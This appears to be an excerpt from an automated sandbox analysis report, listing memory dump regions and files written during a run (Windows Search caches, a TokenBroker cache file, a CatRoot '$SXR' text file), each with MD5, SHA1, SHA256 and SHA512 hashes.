memory/2976-175-0x0000022A09C70000-0x0000022A09C90000-memory.dmp
memory/1180-186-0x0000000005650000-0x0000000005660000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133544367410468573.txt
| MD5 | 80dffedad36ef4c303579f8c9be9dbd7 |
| SHA1 | 792ca2a83d616ca82d973ece361ed9e95c95a0d8 |
| SHA256 | 590ca4d2f62a7864a62ccb1075c55191f7f9d5c5304ea3446961bb50f9e3916e |
| SHA512 | 826b97a4de7c765f8f5ebc520960f68381fd9f4bfe68c2fbe46c6118110c9c14a87dcb8ed8102e60a954b4b3c408f72e7a93fd96317be3d51120a2ddd2faa3ea |
C:\Windows\System32\CatRoot\$SXR\Read.txt
| MD5 | 79668a6729f0f219835c62c9e43b7927 |
| SHA1 | 0cbbc7cc8dbd27923b18285960640f3dad96d146 |
| SHA256 | 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e |
| SHA512 | bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3 |
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\39XIXV5T\microsoft.windows[1].xml
| MD5 | 29e3c94dfa03b794f03e17d8b45295d9 |
| SHA1 | 1a598a72d3d486f77e861f98abcd2f4a8e936365 |
| SHA256 | 7ff0263086f28cc1d842d07a23128b955780d3c8b85b130228c7f65ce2b4262a |
| SHA512 | e2180d73f45da32ac4fb355546103496d73cdf7cb966c60f6a414bc7052e46431177e9009bdfd730d2fe6955b986392720fe3bdc8afbc0388f1b70e438a4ef9c |
memory/2768-216-0x00000216AB160000-0x00000216AB180000-memory.dmp
memory/2768-218-0x00000216AB120000-0x00000216AB140000-memory.dmp
memory/2768-221-0x00000216AB520000-0x00000216AB540000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres
| MD5 | 9eb1dc41ae900de50d74bb44f07d3634 |
| SHA1 | 69d6ac65a08d6106cddafc5e7a52f986cde32827 |
| SHA256 | 63e31e76e91533fa13c6494be236c99116d2e7376b93ff76edefcd774fd4d14f |
| SHA512 | e8747da0d2f1fe9276939573ed57f31223650d46e9fb7bdaab2ba99cfd035462cbc3669286bd4ca2999dc04a531ae3551ee9e7eda99de30eeb7867b92f625736 |
memory/1236-238-0x000001EE76AF0000-0x000001EE76B10000-memory.dmp
memory/1236-242-0x000001EE770C0000-0x000001EE770E0000-memory.dmp
memory/1236-240-0x000001EE76AB0000-0x000001EE76AD0000-memory.dmp
memory/2904-252-0x0000000000BA0000-0x0000000000BB0000-memory.dmp
memory/2936-260-0x0000021D17020000-0x0000021D17040000-memory.dmp
memory/2936-262-0x0000021D16DE0000-0x0000021D16E00000-memory.dmp
memory/2936-264-0x0000021D173F0000-0x0000021D17410000-memory.dmp
memory/4104-281-0x000002730FC60000-0x000002730FC80000-memory.dmp
memory/4104-283-0x000002730FC20000-0x000002730FC40000-memory.dmp
memory/4104-285-0x0000027310030000-0x0000027310050000-memory.dmp
memory/1180-295-0x0000000073530000-0x0000000073CE0000-memory.dmp
memory/1180-296-0x0000000005650000-0x0000000005660000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15
| MD5 | 0e2a09c8b94747fa78ec836b5711c0c0 |
| SHA1 | 92495421ad887f27f53784c470884802797025ad |
| SHA256 | 0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36 |
| SHA512 | 61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel
| MD5 | fb5f8866e1f4c9c1c7f4d377934ff4b2 |
| SHA1 | d0a329e387fb7bcba205364938417a67dbb4118a |
| SHA256 | 1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170 |
| SHA512 | 0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c |